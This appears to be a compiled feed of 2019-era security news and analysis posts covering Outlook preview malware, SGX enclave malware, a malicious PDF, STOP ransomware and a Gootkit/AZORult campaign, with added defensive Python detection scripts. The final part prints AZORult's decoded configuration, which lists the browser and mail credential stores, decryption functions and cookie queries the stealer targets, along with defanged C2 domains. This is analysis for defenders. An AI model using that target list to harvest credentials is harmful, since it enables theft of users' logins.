When you use your web browser or your Outlook client to download a file, there is some clever code which looks at the location (such as the domain the file came from) to see if it originated inside the enterprise or from some unknown place. If it originated outside the enterprise, an ADS zone identifier is applied to the file, which allows other processes to recognize that there is an increased risk of using this file and behave differently. From this point forward, I will refer to this as “mark of the web”.

The standard use of “mark of the web” is to disable macros in Office documents, should they come from an untrusted location, which is referred to as Office Protected View. This is a powerful security feature because it forces malware authors to have some social engineering in the document to get the user to take it out of the protected view to allow the malware to run. Users who are familiar with security protocols are significantly less likely to fall for such social engineering, and thus are more protected, even if the document is opened. I was surprised to see that there was no attempt at social engineering on this document, even though in my experience, most other documents are taking that route. We tested out what happens if the file has the “mark of the web” applied to it. Maybe no social engineering effort has been made because none is needed?

The behaviour in the test was interesting: if I opened the document after the “mark of the web” was applied, the malware would no longer execute, since the method used to launch Excel no longer worked. So far, it behaves as expected, and this outcome is desirable. However, even with the “mark of the web” applied to the file, the Office Preview-mode attack still worked, so it seems that the Office Preview process is not respecting this security feature. I speculate that since macros are disabled in the preview anyway, no one considered the need to look whether the “mark of the web” is set on the file. This would be reasonable if it wasn’t for the issue where the preview would allow Excel to be invoked from an RTF document.

How dangerous is this?

The severity of the attack may vary depending on security stack and configuration. If you have Bromium Secure Platform installed, then the preview is running isolated within a virtual machine (we have done this for the last six years), so there is no risk.

Microsoft has also done good things to help – if the Office installation is in the default configuration, there is a prompt displayed to the user before any macro can run in Excel by way of a modal dialog indicating that the document might not be trustworthy. This feature could prevent this attack from getting as far as the payload without at least some user interaction. Unfortunately, this specific configuration is often switched off since it leads to usability issues, where legitimate Excel workbooks always display the prompt, annoying users. Even if the dialog does appear, there’s no guarantee that the user will not click on it by mistake. If a user works with a lot of Excel documents and has many of them open at any given time, they may not realise a particular Excel instance is unexpected. It is possible they may just allow the macro to run anyway since they might be used to having to clear a warning dialog when working with legitimate files.

Finally, there’s a concern that although this attack required a macro in Excel to run, which could be prevented by paying attention to the prompt, it is fair to say that Excel is a complex program and it is entirely possible that a future sample would be able to come up with a smarter way to infect the host.

Since the attack also works with the preview mode in Outlook, the risk of infection increases: the user does not need to save the file to disk for it to be rendered by the Explorer Preview. Just clicking on the attachment in Outlook with previews enabled would be enough for the attack to work.

Bromium considers this attack to have a significantly higher chance of success than other attack methods that we traditionally see in Office documents. With the reduction in social engineering required for the attack to be successful, even well-trained users will be at risk of infection.

Mitigation:

We recommend that machines without Bromium installed have the Office Preview feature disabled. Doing so will reduce the risk to a similar level to other Office malware varieties that we see in the wild.

If you want to know more about this malware, look out for a follow-up post in a few days.

The post Preview Pain: Malware Triggers in Outlook Preview Without User Opening Word Document appeared first on Bromium.


Cybersecurity Leaders From Maersk and Westfield Insurance Discuss Digital Transformation at Major Industry Event

In June 2017, the cybersecurity world changed. As soon as NotPetya began infecting systems in Ukraine and spreading across Europe and beyond, it became clear that the intent of this worm wasn’t espionage, distributing malware or holding data for ransom. Rather, it was designed to destroy data, shut down systems and create havoc.

One of the most severely impacted organizations was global shipping giant Maersk, which transports 20 percent of the world’s trade goods. When Maersk’s systems went down, it sent shockwaves around the world and caused security observers to shudder. NotPetya was apparently a cyberweapon launched against Ukraine, but a far greater number of countries and organizations became collateral damage.

It was a wake-up call for Maersk, according to Andy Powell, who joined the company as its new chief information security officer (CISO) in June 2018, a year after the NotPetya attack.

“What Maersk was very strong at was our ability to recover,” Powell said in a fireside chat with IBM Security General Manager Mary O’Brien on Tuesday, the opening night of the 2019 IBM Think conference. “Balancing business resilience with preventative measures means that any company can address some of these high-end attacks, but you’ve got to accept that some of them are going to get through. And therefore, you need to be able to recover your business.”

While cybersecurity inevitably changed in the wake of NotPetya, it’s continuing a rapid transformation as businesses digitize and create ever more data. O’Brien and Powell discussed these profound shifts during their chat, along with Kevin Baker, CISO of Westfield Insurance, who underscored the impacts of digital transformation on data security, risk and compliance.

Watch the video from Think 2019

Lessons in Resiliency and Agile Security

In the age of cloud and connected everything, the volume of data being produced has exploded, along with opportunities for greater insights, innovation and new business models. This digital transformation has broad implications for security.

“Our clients want to know where their containers are, they want to know what part of the process is involved, they want to know information around what they’re moving,” Powell said. “We can provide that as part of the transformation.”

To secure digital innovation for clients, alongside its legacy systems, Maersk’s security team has taken an agile approach. Security is frequently seen as a roadblock to innovation, Powell said. Bringing together project teams and the security organization helps speed innovations to market by building security into the process from the beginning.

“The reality is the security people need to be working with them in those teams to actually integrate security from day one, and that’s starting to really pay off, because we’re no longer seen as the outsiders,” Powell said. “We’re seen as somebody who is prepared to adopt the culture and work with them. That teamed approach is very important.”

Focus on Data Security, Risk and Compliance

Ohio-based Westfield Insurance, with $4.9 billion in assets, has been in business since 1848. That means “a lot of data,” Baker said during the Think fireside chat.

“Because of digitization, it’s a veritable explosion of data. Our job is to know what data we have, where it is, how many copies of it we have, where it’s moving, who can access it and what the criticality of that data is so we can focus on data that has a regulatory import,” Baker said.

Baker’s team focuses on governance and risk, monitoring existing regulations like the New York Department of Financial Services (NYDFS) cybersecurity regulation. And they look to the horizon for emerging compliance risks, such as California’s data privacy law, which will take effect in January 2020.

The California Consumer Privacy Act (CCPA) follows in the footsteps of the European Union (EU)’s General Data Protection Regulation (GDPR) with strict data privacy mandates, including a “right to be forgotten,” whereby companies will be required to destroy certain types of customer data.

“‘Forget me’ is a new capability that we have to solve for,” Baker said. “So we’re looking for ways that we can tag the data, move the security control down at the data element, and use the same tagging and process in multiple ways. It’s more than data classification, but it starts there.”

How Can Digital Transformation Help Reduce Complexity?

Digital transformation in business — through the adoption of technologies such as the cloud, artificial intelligence, and mobile and smart devices — has had major implications for the security industry as well. Although security products have made strides in protecting businesses beyond the traditional firewall, complexity is a hidden cost of innovation.

“We believe the No. 1 challenge is the complexity that we — the vendors and our clients — have jointly created,” O’Brien said during her chat at the IBM Think conference, her first as IBM Security general manager. “We got here because we let the latest threat of the day or requirement drive our technology and our strategy. So every time there was a new attack, a new merger, a new regulation, we created a new tool.”

The second problem of security innovation, O’Brien added, is that these products are created, purchased and deployed in silos. They are not integrated and don’t naturally talk to each other. According to O’Brien, it’s time to eliminate this complexity to enable business innovation and transformation.

This past October, IBM Security launched IBM Security Connect, a simple, open and connected cloud platform that can automatically access security data no matter where it resides. This enables security teams to take advantage of existing investments, from IBM or other vendors, without compromising effectiveness.

“You have insights today, but not total insights,” O’Brien said. “But because Connect can tap into your existing data wherever it is, you will see the full picture of your security situation without having to migrate your data or manually integrate it.”

For his part, Baker said limiting the number of tools but integrating them across multiple vendor systems is key to making strides toward his team’s data security goals.

“We elected to use not more security tools, but fewer security tools. We chose tools that were on their own pretty powerful, things like IBM’s QRadar and Guardium. Then we integrated that with other vendors,” Baker explained. “We use these tools to create our own link and do our own analysis. Not just the net-new data, but even the legacy data, and then to analyze that data as a single unit, to track the most critical data. We know that we can’t track it all. We need to zero in on what’s important.”

The post Cybersecurity Leaders From Maersk and Westfield Insurance Discuss Digital Transformation at Major Industry Event appeared first on Security Intelligence.

Malicious Windows EXE Files Infect macOS Users With Infostealers and Adware

Security researchers discovered several Microsoft Windows EXE files using malicious payloads to infect macOS users with infostealers and adware.

Trend Micro found one adware-bearing sample hiding within an installer for the Windows and Mac firewall app Little Snitch, which is available for download from various torrent websites. The sample was able to bypass Mac’s Gatekeeper, since this built-in protection mechanism doesn’t conduct code signature checks for or otherwise verify EXE files on machines running macOS.

Contained within the ZIP file downloaded from the torrent websites is a DMG file that hosts the Little Snitch installer. This installer hides an EXE file that loads an infostealer. The malware then gathers basic system information, such as Memory, BootROMVersion and SMCVersion, and scans the /Application directory for installed apps, such as App Store, FaceTime and Mail. After completing these steps, the malware sends all its findings to its command-and-control (C&C) server.

Additionally, the executable is capable of downloading several files from the internet. These files, in turn, download adware and other potentially unwanted applications.
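Since Gatekeeper does not examine EXE files, a defender can look for them explicitly. The scanner below is added here as an illustration (not Trend Micro’s or Apple’s code): it walks a directory tree such as a mounted DMG or an extracted .app bundle, recognises Windows PE images by their MZ/PE headers rather than by file name, and reports each one with its architecture and subsystem. The bundle it scans is constructed in a temporary directory with placeholder content.

```python
import os
import struct
import tempfile
from typing import List, Tuple


def is_pe_image(data: bytes) -> Tuple[bool, str]:
    """Return (True, description) if `data` begins a Windows PE image.
    Follows the MZ stub's e_lfanew to the PE signature and reads the COFF
    Machine field and the optional header's Subsystem; the name is ignored."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False, ""
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False, ""
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    opt_off = e_lfanew + 24            # optional header follows the 20-byte COFF header
    if opt_off + 70 > len(data):
        return True, f"machine=0x{machine:04x} subsystem=unknown"
    (magic,) = struct.unpack_from("<H", data, opt_off)
    (subsystem,) = struct.unpack_from("<H", data, opt_off + 68)  # same offset in PE32 and PE32+
    names = {2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}
    fmt = "PE32+" if magic == 0x20B else "PE32"
    return True, f"machine=0x{machine:04x} {fmt} subsystem={names.get(subsystem, subsystem)}"


def scan_tree(root: str) -> List[Tuple[str, str]]:
    """List every file under `root` that is really a PE image, whatever its extension."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(64 * 1024)     # headers sit near the start of the file
            except OSError:
                continue
            ok, desc = is_pe_image(head)
            if ok:
                hits.append((os.path.relpath(path, root), desc))
    return sorted(hits)


def build_sample_bundle(base: str) -> str:
    """Construct a fake 'Little Snitch.app' bundle (placeholder content, not a real
    installer) holding one PE file disguised as .dat next to a Mach-O-looking file."""
    macos_dir = os.path.join(base, "Little Snitch.app", "Contents", "MacOS")
    os.makedirs(macos_dir)
    pe = bytearray(0x200)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x80)          # e_lfanew -> PE signature at 0x80
    pe[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", pe, 0x84, 0x8664)        # IMAGE_FILE_MACHINE_AMD64
    opt = 0x80 + 24
    struct.pack_into("<H", pe, opt, 0x20B)          # PE32+ magic
    struct.pack_into("<H", pe, opt + 68, 2)         # IMAGE_SUBSYSTEM_WINDOWS_GUI
    with open(os.path.join(macos_dir, "Installer.dat"), "wb") as fh:
        fh.write(pe)
    with open(os.path.join(macos_dir, "Little Snitch"), "wb") as fh:
        fh.write(b"\xcf\xfa\xed\xfe" + b"\0" * 60)  # Mach-O 64-bit magic, must not be flagged
    return os.path.join(base, "Little Snitch.app")


def demo() -> List[Tuple[str, str]]:
    """Build the constructed bundle and scan it; returns the PE files found."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_bundle(tmp))


if __name__ == "__main__":
    for rel, desc in demo():
        print(f"PE image inside bundle: {rel} ({desc})")
```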

Bridging Windows and macOS With Malware

These files don’t constitute the only instance of a digital threat crossing between Windows and macOS. In May 2017, for instance, Fox-IT identified a Mac OS X version of Snake malware, which traditionally targets the Windows platform. Less than a year later, security researcher Patrick Wardle of Objective-See uncovered CrossRat, a versatile threat capable of targeting Windows, macOS and Linux machines.

In a few cases, researchers have even observed attack campaigns distributing separate threats that target Windows and Mac computers. Security researchers at Microsoft came across one such instance in 2011 containing both the Mac-based Olyx backdoor and other Windows malware.

How to Defend Against Malicious EXE Files

Security professionals can help protect against adware-laden EXE files by creating security policies that limit the types of websites from which employees can download applications. They can frame this policy within the context of a larger app approval framework through which security teams follow a logical sequence to upload/review apps and ensure vendor integration. At the same time, security professionals should apply user activity analytics to a long-term data repository to sufficiently protect corporate data against digital threats like infostealers.

The post Malicious Windows EXE Files Infect macOS Users With Infostealers and Adware appeared first on Security Intelligence.

Experts found a way to create a super-malware implanted in SGX-enclaves

Researchers devised a new technique to hide malware in Intel SGX secure enclaves, making it impossible for several security technologies to detect.

Security researchers devised a new technique to hide malware in Intel SGX secure enclaves. Intel Software Guard eXtensions (SGX) is a technology for application developers that allows protecting select code and data from disclosure or modification. Intel SGX lets application code execute within an SGX enclave, a protected area of execution in memory.

The technique devised by the experts lets them deploy malicious code in a memory area that is protected by design, which makes detection hard.

Enclaves are designed to be protected from processes running at higher privilege levels, including the operating system, kernel, BIOS, SMM, hypervisor.

The team of researchers composed of Michael Schwarz, Samuel Weiser and Daniel Gruss of the Graz University of Technology in Austria, includes those that discovered the Spectre-Meltdown CPU vulnerabilities. They devised a method to bypass security protection and implant malware in the enclaves leveraging a benign application that uses a malicious enclave when executed.

Experts pointed out that the host application communicates with the enclave through an interface that should not allow the enclave to attack the app.

The researchers used Transactional Synchronization eXtensions (TSX), available in modern Intel CPUs, to build a fault-resistant read primitive called TSX-based Address Probing (TAP).

“Our SGX-ROP attack uses new TSX-based memory-disclosure primitive and a write-anything-anywhere primitive to construct a code reuse attack from within an enclave which is then inadvertently executed by the host application. With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer.” states the research paper published by the experts.

“We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits.”

The experts also developed a fault-resistant write primitive, Checking Located Addresses for Writability (CLAW), to determine whether a given memory page can be written to.

The primitive encapsulates a write instruction to the target memory page within a TSX transaction and aborts the transaction immediately after the write.

The experts determine whether the target memory page is writable by analyzing the return value of the transaction.

Malware injected into an enclave could bypass protections such as Address Space Layout Randomization (ASLR), stack canaries, and address sanitizer.

“The strong confidentiality and integrity guarantees of SGX fundamentally prohibit malware inspection and analysis, when running such malware within an enclave.” continues the analysis.

“Moreover, there’s a potential threat of next-generation ransomware which securely keeps encryption keys inside the enclave and, if implemented correctly, prevents ransomware recovery tools,” the academics explain.


The experts published a proof-of-concept exploit that bypassed ASLR, stack canaries, and address sanitizer; the overall exploit process took only 20.8 seconds. Hardware and software mitigations against this new attack will be implemented by Intel in future generations of CPUs.

“With SGX-ROP, we bypassed ASLR, stack canaries, and address sanitizer, to run ROP gadgets in the host context enabling practical enclave malware.” conclude the researchers.

“We conclude that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits.”

Pierluigi Paganini

(SecurityAffairs – SGX enclaves, hacking)

The post Experts found a way to create a super-malware implanted in SGX-enclaves appeared first on Security Affairs.

Security Affairs: Malicious PDF Analysis

In the last few days I have done some analysis on malicious documents, especially PDF. Then I thought, “Why not turn a PDF analysis into an article?”

Let’s go to our case study:

I received a scan request for a PDF file that was reported to support an antivirus vendor, and it replied that the file was not malicious. Because the manufacturer’s analysis was not satisfactory, the team responsible for handling the incident requested a second opinion, since in other anti-virus tools the document was reported to be malicious. The team needed evidence to prove the risk involved in the file.

While conducting an initial analysis on the file, I identified that I had something suspicious:

After analyzing the structure of the PDF’s objects, it is possible to identify a malicious URL that is called during the process of opening the document; that is, when the user opens the file on their workstation, it silently calls the URL, as shown below:

When performing a domain verification it is possible to reach the IP bound to it:

When performing a URL reputation analysis, a malicious history is identified:

When performing an IP reputation analysis, a malicious history is identified:
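The object-structure check described above, as an added example that is not the author’s own tooling: it scans the raw PDF for objects, follows the catalog’s /OpenAction reference to its action dictionary and extracts the /URI target, and (a generalization beyond the case in the text) also walks page-level /AA additional-action entries, which fire on the same open event. The hostnames it returns are the input for the domain resolution and reputation checks that follow. The PDF is constructed inline with a placeholder domain.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Constructed sample (placeholder domain, not the real document): the catalog's
# /OpenAction points at a URI action, and the page carries an /AA (additional
# actions) dictionary whose /O (open) entry points at a second URI action.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /AA << /O 5 0 R >> >> endobj
4 0 obj << /Type /Action /S /URI /URI (http://placeholder-malicious.invalid/track?id=1) >> endobj
5 0 obj << /Type /Action /S /URI /URI (http://placeholder-malicious.invalid/open) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
OPEN_REF = re.compile(rb"/OpenAction\s*(\d+)\s+\d+\s+R")
AA_DICT = re.compile(rb"/AA\s*<<(.*?)>>", re.S)
AA_ENTRY = re.compile(rb"/(\w+)\s*(\d+)\s+\d+\s+R")


def parse_objects(pdf: bytes) -> Dict[int, bytes]:
    """Map object number -> raw object body. The whole file is scanned rather than
    trusting the xref table, which malicious files often leave broken or stale."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}


def string_value(body: bytes, key: bytes) -> str:
    """Value of `key` when written as a literal string (...); '' if absent."""
    m = re.search(rb"/" + key + rb"\s*\(([^)]*)\)", body)
    return m.group(1).decode("latin-1") if m else ""


def action_info(body: bytes) -> Tuple[str, str]:
    """(action subtype, target) for an action dictionary: /URI carries the URL,
    /Launch carries /F; other subtypes (e.g. /JavaScript) are reported by name."""
    s = re.search(rb"/S\s*/(\w+)", body)
    kind = s.group(1).decode("latin-1") if s else "?"
    return kind, string_value(body, b"URI") or string_value(body, b"F")


def find_auto_actions(pdf: bytes) -> List[Tuple[str, str, str]]:
    """(trigger, subtype, target) for every action the reader runs on its own,
    without a click: the catalog /OpenAction and page-level /AA entries."""
    objs = parse_objects(pdf)
    findings = []
    for body in objs.values():
        m = OPEN_REF.search(body)
        if m:
            kind, target = action_info(objs.get(int(m.group(1)), b""))
            findings.append(("OpenAction", kind, target))
        for aa in AA_DICT.finditer(body):
            for trigger, num in AA_ENTRY.findall(aa.group(1)):
                kind, target = action_info(objs.get(int(num), b""))
                findings.append(("AA/" + trigger.decode("latin-1"), kind, target))
    return findings


def hostnames(findings: List[Tuple[str, str, str]]) -> List[str]:
    """Distinct hosts behind URI actions, ready for DNS and reputation lookups."""
    return sorted({urlsplit(t).hostname for _, kind, t in findings if kind == "URI" and t})


if __name__ == "__main__":
    hits = find_auto_actions(SAMPLE_PDF)
    for trigger, kind, target in hits:
        print(f"{trigger}: {kind} -> {target}")
    print("hosts to check:", hostnames(hits))
```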

The interesting thing is that years ago we would never have said that infection would be possible through malicious code, URLs or shellcode obfuscated inside documents such as PDF, DOC, DOCX, XLS, XLSX and PPT. Security tools must keep adapting to this reality of attack and infection.

It is essential that security professionals become increasingly able to carry out this type of analysis, which antivirus tools are usually not able to do. I leave here a hint about the importance of studying malicious document analysis.

About the author: Zoziel Freire

Cyber Security Analyst
Content Writer of the portal: www.infosectrain.com
Malicious document analyst
CompTIA Security Analytics Professional
LPIC-3 Enterprise Linux Professional
CompTIA Cybersecurity Analyst
Linkedin: https://www.linkedin.com/in/zozielfreire/

Twitter: https://twitter.com/zoziel

Pierluigi Paganini

(SecurityAffairs – PDF analysis, hacking)

The post Malicious PDF Analysis appeared first on Security Affairs.


Researchers Implant “Protected” Malware On Intel SGX Enclaves

Cybersecurity researchers have discovered a way to hide malicious code in Intel SGX enclaves, a hardware-based memory encryption feature in modern processors that isolates sensitive code and data to protect it from disclosure or modification. In other words, the technique allows attackers to implant malware code in a secure memory that uses protection features of SGX which are otherwise

STOP ransomware claims even more victims

Despite having been ‘in the wild’ for some weeks now, infections caused by STOP ransomware have continued to rise. Perhaps somewhat ironically, those most affected (at the moment) appear to be software pirates.

Security analysts have discovered the STOP executable is being bundled with adware installers, commonly found on websites hosting warez and software licensing cracks. As well as downloading illegal software, users may also be downloading – and installing – malware on their computer.

Much worse than adware

Although they exhibit virus-like behaviours, adware is usually more of an annoyance. But once compromised by STOP, the annoyance becomes a serious problem.

Once installed, STOP quickly encrypts all of the user’s documents, changing the filename to .djvu, .tro or .rumba. Once encrypted, the file is completely inaccessible. The malware also creates a text file (called _openme.txt) in each affected folder, explaining that the machine is infected and the user cannot access their data until they pay a ransom of $980. If the user pays within 72 hours of infection, the cost is reduced to $490.

The text file also contains a ‘personal ID’ which the hackers claim is used to generate the decryption key needed to restore access to affected files. Without decryption, the user cannot access any of their files or photos.

What if I have been infected by STOP?

Tampering with the encrypted files may permanently damage them, and the chances of guessing the correct decryption key are virtually zero. The only sure way to regain access to your data is to restore everything from backup.

Restoring data is time consuming and (sometimes) complicated – and you need a full backup of all your files and applications too. If you do not currently back up your data, now is the time to start.

Alternatively, you could pay the ransom. Bear in mind however that you are dealing with criminals who may increase the ransom again. Or steal your money without supplying a decryption key at all.

Some technical sources suggest that STOP can be reversed, but you will need to seek advice from an expert. As always, these services are unlikely to offer any form of guarantee of success and you could still lose all your data.

Protecting against STOP ransomware infections

Preventing STOP ransomware infections is possible if you do the following:

  1. Install anti-malware protection. Panda Dome Advanced provides security tools that block STOP and other ransomware from installing on your computer. Download a free trial now to get started.
  2. Avoid warez and crack websites. Using warez to steal software is illegal – and these sites are notorious for hosting malware anyway. Paying for some software may be expensive, but it is far cheaper than losing all your files to a virus. Panda Dome can also be configured to block access to warez sites to protect you and your family.
  3. Take regular backups. Windows 10 and Mac OS both make it incredibly easy to take full backups of your machine. Once configured, your computer will take care of the rest. If something does go wrong in the future, you will have a copy of all your files ready to restore quickly.

Ransomware is very effective because it targets people who aren’t prepared. By installing anti-malware tools, checking your web surfing behaviour and performing routine data backups, you stand a very good chance of avoiding STOP infections.


The post STOP ransomware claims even more victims appeared first on Panda Security Mediacenter.

Report: Banking Trojans Accounted for More Than Half of All Malicious Payloads in Q4 2018

A new report found that banking Trojans accounted for more than half of all malicious payloads observed in the fourth quarter of 2018.

According to the “Proofpoint Quarterly Threat Report,” this threat dominated the cyber landscape at the end of 2018, constituting 56 percent of all malicious payloads Proofpoint researchers detected.

Several new families helped banking Trojans beat out other categories of malware, including downloaders, credential stealers and remote-access Trojans (RATs), which made up 17 percent, 17 percent and 8 percent of total threats, respectively. Ransomware was barely present in Q4 2018 after spiking and quickly declining in the previous two quarters.

That being said, it’s clear that threat actors preferred to use well-known banking malware over newcomers. For example, Emotet and its botnet-like capabilities accounted for 76 percent of banking Trojan activity in the quarter; taken together, Emotet, Ursnif and Panda Banker (aka Zeus Panda) made up 97 percent of banking Trojan detections for Q4 2018.

More Active and More Sophisticated

Proofpoint’s findings help illustrate how threat actors iterated their banking Trojan use in 2018. Check Point found evidence of this trend when it observed banking Trojans increase their global impact by 50 percent between February and June of last year. In fact, the Dorkbot and Ramnit families made it onto the security firm’s “Top 10 Most Wanted Malware” list for June 2018.

Banking Trojans have also grown in sophistication more generally over the past few years. In April 2017, for instance, Proofpoint observed a large email campaign exploiting a new zero-day vulnerability to deliver the Dridex banking Trojan.

Other banking malware, including QakBot, has added wormlike features that enable it to self-propagate through shared drives and removable media. All the while, many banking Trojans increasingly conduct fileless attacks as a way of evading detection. Cisco Talos observed one such fileless campaign involving Ursnif in January 2019.

How Security Professionals Can Defend Against Banking Trojans

Security professionals can help defend their organizations against banking Trojans by using artificial intelligence technologies to move beyond rule-based security. Organizations should also consider using a unified endpoint management solution that can monitor endpoints for suspicious behavior indicative of malware and automatically uninstall any infected applications.

The post Report: Banking Trojans Accounted for More Than Half of All Malicious Payloads in Q4 2018 appeared first on Security Intelligence.

Security Affairs: Gootkit: Unveiling the Hidden Link with AZORult

Cybaze-Yoroi ZLAB revealed an interesting hidden connection between the AZORult toolkit and a specific Gootkit payload.

Introduction

In recent days, a large attack campaign hit several organizations across Italian cyberspace; as stated in bulletin N020219, the attack waves tried to impersonate legitimate communications from a well-known express courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkit payload.

Technical analysis

Stage 1 – The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, which most of the time managed to avoid antivirus detection during the initial stages of the campaign.

Hash: 12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threat: malicious js
Desc: Obfuscated malicious JS. It downloads the first component and keeps communicating with the C2 server.

Table 1: Generic information about the malicious JS file

This JS file is an obfuscated dropper whose purpose is to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld[.]com and driverconnectsearch[.]info. The behaviour of this sort of JavaScript stager is as simple as it is interesting: it downloads other executable code able to do virtually anything the attacker wants. This pattern and the simplicity of the code itself remotely resemble the Brushaloader threat, a known dropper/stager written in VBScript that contacts its remote infrastructure in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionality, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet archive encoded within the chunk of executable JavaScript code returned by driverconnectsearch[.]info, then stores it in “%APPDATA%\Local\Temp\”.

As shown in Figure 3, the first characters of the encoded payload string are “TVNDRg”, which decodes (from base64) to “MSCF”: the standard header of the Microsoft Cabinet compressed file format.
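The MSCF observation above generalises into a small triage check for scripts that carry a base64-encoded file. The following Python is an added example, not code from the Yoroi analysis: it decodes only the head of each base64 run found in a script and compares it with known file magics (the CAB header seen in this campaign, plus PE and ZIP as my generalisation); the stager snippet and the benign script it scans are constructed inputs.

```python
import base64
import re

# File-format magic bytes worth flagging when they appear base64-encoded inside
# a script. "MSCF" is the Microsoft Cabinet header observed in this campaign;
# the other two are a generalisation to payload types common in droppers.
MAGIC_BY_PREFIX = {
    b"MSCF": "Microsoft Cabinet (.cab)",
    b"MZ": "PE executable",
    b"PK\x03\x04": "ZIP archive",
}

# Candidate base64 runs: standard alphabet, at least 16 characters, optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_prefix(b64_text: str, nbytes: int = 4) -> bytes:
    """Decode only as much of a base64 string as is needed to recover its first
    nbytes. Works on a bare prefix such as "TVNDRg" that carries no padding."""
    quanta = -(-nbytes // 3)                 # ceil(nbytes / 3): 4 chars -> 3 bytes
    chunk = b64_text[: quanta * 4]
    chunk += "=" * (-len(chunk) % 4)         # pad a short tail to a 4-char boundary
    try:
        return base64.b64decode(chunk, validate=True)[:nbytes]
    except ValueError:                       # binascii.Error is a ValueError subclass
        return b""


def find_embedded_payloads(script: str) -> list:
    """Return (offset, base64_prefix, description) for each base64 run whose
    decoded head matches a known file magic. Only encodings that start at
    byte 0 of the payload are caught; a stager that splits or re-orders the
    string would need its pieces joined first."""
    hits = []
    for match in B64_RUN.finditer(script):
        head = decode_prefix(match.group(0), 4)
        for magic, description in MAGIC_BY_PREFIX.items():
            if head.startswith(magic):
                hits.append((match.start(), match.group(0)[:8], description))
                break
    return hits


# Constructed sample input: the CAB magic followed by zero-filled header bytes,
# embedded in a JScript-style snippet the way the campaign's script carries it.
# "FileSystemObject" is itself a 16-character base64-alphabet run, so it also
# exercises the rejection path (it decodes to no known magic).
CONSTRUCTED_CAB = b"MSCF" + b"\x00" * 12
SAMPLE_STAGER = (
    'var data = "{}";\n'
    'var fso = new ActiveXObject("Scripting.FileSystemObject");\n'
).format(base64.b64encode(CONSTRUCTED_CAB).decode())

# Constructed benign script: a long base64 run that decodes to plain text.
BENIGN_SCRIPT = 'var greeting = "{}";'.format(
    base64.b64encode(b"hello world, benign text").decode()
)

if __name__ == "__main__":
    for offset, prefix, description in find_embedded_payloads(SAMPLE_STAGER):
        print(f"offset {offset}: run starting {prefix!r} decodes to a {description}")
```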

Figure 4: JavaScript downloaded from the driverconnectsearch[.]info server.

Stage 2 – The Cabinet

This .CAB archive is actually just a shell for a PE32 executable file:

Hash: 2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
Threat: RuntimeBroker5.exe
Desc: First component downloaded by the malicious JS file.

Table 2: Generic information about RuntimeBroker5.exe (AZORult)

When executed, the RuntimeBroker5.exe sample behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample does not perform only this download. Here is one of the key points of the article: it also establishes a communication channel with the AZORult C2 host “ssl[.]admin[.]itybuy[.]it”.

The network packets exchanged with the server confirm this identification, due to the known communication patterns, and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat.

As shown in the following figure, the files written to the “%APPDATA%\Local\Temp\” path closely match those described in the AZORult analysis by the Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

  1. firefox.exe
  2. SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  3. SOFTWARE\Mozilla\Mozilla Firefox
  4. SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
  5. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
  6. %appdata%\Mozilla\Firefox\Profiles\
  7. MozillaFireFox
  8. CurrentVersion
  9. Install_Directory
  10. nss3.dll
  11. thunderbird.exe
  12. SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  13. SOFTWARE\Mozilla\Mozilla Thunderbird
  14. SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
  15. %appdata%\Thunderbird\Profiles\
  16. ThunderBird
  17. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  18. SELECT fieldname, value FROM moz_formhistory
  19. NSS_Init
  20. PK11_GetInternalKeySlot
  21. PK11_Authenticate
  22. PK11SDR_Decrypt
  23. NSS_Shutdown
  24. PK11_FreeSlot
  25. logins.json
  26. logins
  27. hostname
  28. timesUsed
  29. encryptedUsername
  30. encryptedPassword
  31. cookies.sqlite
  32. formhistory.sqlite
